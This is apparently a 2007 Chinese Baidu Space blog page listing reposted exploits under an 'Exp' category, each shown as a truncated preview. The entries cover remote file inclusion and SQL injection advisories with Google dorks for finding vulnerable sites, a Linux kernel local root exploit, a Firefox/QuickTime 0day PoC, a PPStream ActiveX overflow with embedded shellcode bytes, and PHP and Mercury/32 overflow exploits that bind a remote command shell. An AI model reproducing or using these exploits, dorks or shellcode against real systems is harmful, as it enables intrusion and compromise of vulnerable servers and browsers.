百度首页 | 百度空间
 
文章列表
  
您正在查看 "Exp" 分类下的文章

Segue 1.8.4 Middlebury College远程文件包含
2007-10-02 14:36
Segue 1.8.4 Middlebury College <=   Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search? ... mp;start=0&sa=N
//上面是搜索
#
#Vuln Code
##############################################################################################
#
#ERR
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
php WCMS XT 0_0_7 BETA 远程文件包含
2007-10-02 01:37

#   php WCMS XT   0_0_7 BETA <=   Remote File Inclusion Vulnerability
#
#Dork:http://www.google.com.tr/search? ... php+WCMS+&meta=
//搜索
#
#Vuln Code
############################################

阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
火狐又暴0day
2007-10-02 00:39
Mozilla Firefox + QuickTime Command Execution PoC (0day)

<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seams that QuickTime media formats can hack into Firefox.
The result of this vulnerability can lead to full compromise of
the browser and maybe eve
阅读全文>>
类别:Exp | 评论(1) | 浏览()
 
Linux Kernel 2.4/2.6 x86-64 System Call Emulation Exploit
2007-10-02 00:38
/*
* exploit for x86_64 linux kernel ia32syscall emulation
* bug, discovered by Wojciech Purczynski <cliph_at_isec.pl>
*
* by
* Robert Swiecki <robert_at_swiecki.net>
* Przemyslaw Frasunek <venglin_at_freebsd.lublin.pl>
* Pawel Pisarczyk <pawel_at_immos.com.pl>
* of ATM-Lab http://www.atm-lab.pl
*/

#include <sys/types.h>
#include <sys/w
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit(上传漏洞)
2007-10-02 00:34
<?php
## Zomplog <= 3.8.1 Arbitrary File Upload Exploit
## by InATeam (http://inattack.ru/)
## tested on versions 3.8.1 with security patch, 3.8.1, 3.8, 3.7.5

echo "------------------------------------------------------------\n";
echo "Zomplog <= 3.8.1 Arbitrary File Upload Exploit\n";
echo "(c)oded by Raz0r, InATeam (http://inattack.ru/)\n";
echo "dork: \"Powered by Zomplog\"\n";
echo "-----------------------------------
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities
2007-09-03 09:03
################################################################################
# Weblogicnet                                                                   #
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
Yvora CMS 1.0 (error_view.php ID) Remote SQL Injection Vulnerability
2007-09-03 09:02
########################################################################
# Yvora CMS v1.0 - Remote SQL Injection
# Vendor         : http://www.yvora.nl/
# Found By       : k1tk4t - k1tk4t[4t]newhack.org
# Location       : Indonesia    --   #newhack[dot]org @irc.dal.net
########################################################################
POC;
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
终点小说系统用户验证漏洞
2007-09-01 08:39
漏洞文件:
session.asp

程序代码: [ 复制代码到剪贴板 ] [ 运行代码 ]
if request.cookies("CnendWeb")("admininfo_loginname")<>"" a
阅读全文>>
类别:Exp | 评论(2) | 浏览()
 
PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit
2007-09-01 08:34
// author: dummy
// written by dummyz@126.com (2007)

#define _CRT_SECURE_NO_DEPRECATE

#include <windows.h>
#include <stdio.h>

const unsigned char shellcode[174] =
{
   0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
   0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
   0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E,
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
MS07-046
2007-08-30 09:03

我真服 一天天的漏洞出的那个叫快啊 调试中。。

/*
* MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code

* by Hong Gil-Dong & Chun Woo-Chi

* Yang yeon(?~1542), Korea
* "I shall keep clenching my left fist unitl i see the real tao".

* This POC is only for test. If an application read a malformed wmf
* file like this POC, the application will be crashed. If you apply
* this code, you can execute an arbitrary

阅读全文>>
类别:Exp | 评论(1) | 浏览()
 
Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
2007-08-24 08:48
*******************************************************************************
# Title    :   Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability
# Author   :   ajann
# Contact :   :(
# S.Page   :   http://www.remository.com/
# $$       :   Free
# Dork     :   inurl:func=selectcat + com_remository  
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
Joomla Component NeoRecruit <= 1.4 (id) SQL Injection Vulnerability
2007-08-24 08:47
*******************************************************************************
# Title    :   Joomla Component NeoRecruit <= 1.4 (id) Remote Blind SQL Injection Vulnerability
# Author   :   ajann
# Contact :   :(
# S.Page   :   http://www.neojoomla.com/
# $$       :   54,90
# Dork     :   inurl:index.php?option=com_NeoRec
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)
2007-08-23 09:32
<?php

##########################################################
###----------------------------------------------------###
###--------PHP win32std Buffer Overflow Exploit--------###
###----------------------------------------------------###
###-Tested on:-PHP 5.2.3-------------------------------###
###------------Windows XP SP2 Eng----------------------###
###----------------------------------------------------###
###-Note:-Shellcode is hard coded for W
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit
2007-08-23 09:31
<?php
/*
Inphex
317 Bytes , Windows Command Shell   Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n

telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\apache>
7ffdf020   7c911005 7c9110ed 00000001 00000000

shoutz go to Kevin Finisterre
*/

if(!function_exists('win_browse_file')) {
die('win32std extension i
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit
2007-08-23 09:28
/*
Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow(Universal)
Public Version 1.0
http://www.ph4nt0m.org   
2007-08-22

Code by: Zhenhan.Liu
Original POC: http://www.milw0rm.com/exploits/4294

Vuln Analysis: http://pstgroup.blogspot.com/2007/08/tipsmercury-smtpd-auth-cram-md5-pre.html

Our Mail-list: http://list.ph4nt0m.org   (Chinese)

   It will bind a cmdshell on port 1154 if successful.
阅读全文>>
类别:Exp | 评论(0) | 浏览()
 
[首页] 1 [2] [下一页] 
     
 
 
文章分类
  
默认分类(5)
 
技术文章(31)
 
心情文章(19)
 
Exp(28)
 
工具(1)
 
     
 
文章存档
  
 
 
 
 
 
 
     
 
最新文章评论
    

你好 如果可以的话 希望你会给我一个下载地址!
 

哇。。那麼爽? 我好多年都沒見到過下雪了。。

師傅``` 你雜不。。拍照下來??...
 

狂汗地说。
估计那什么小佑的没有搞清楚情况。。
我们感情很好呢。呵呵。。
 

很不错!
 

我也要和83087368@qq.com
 
更多评论>>
     


©2008 Baidu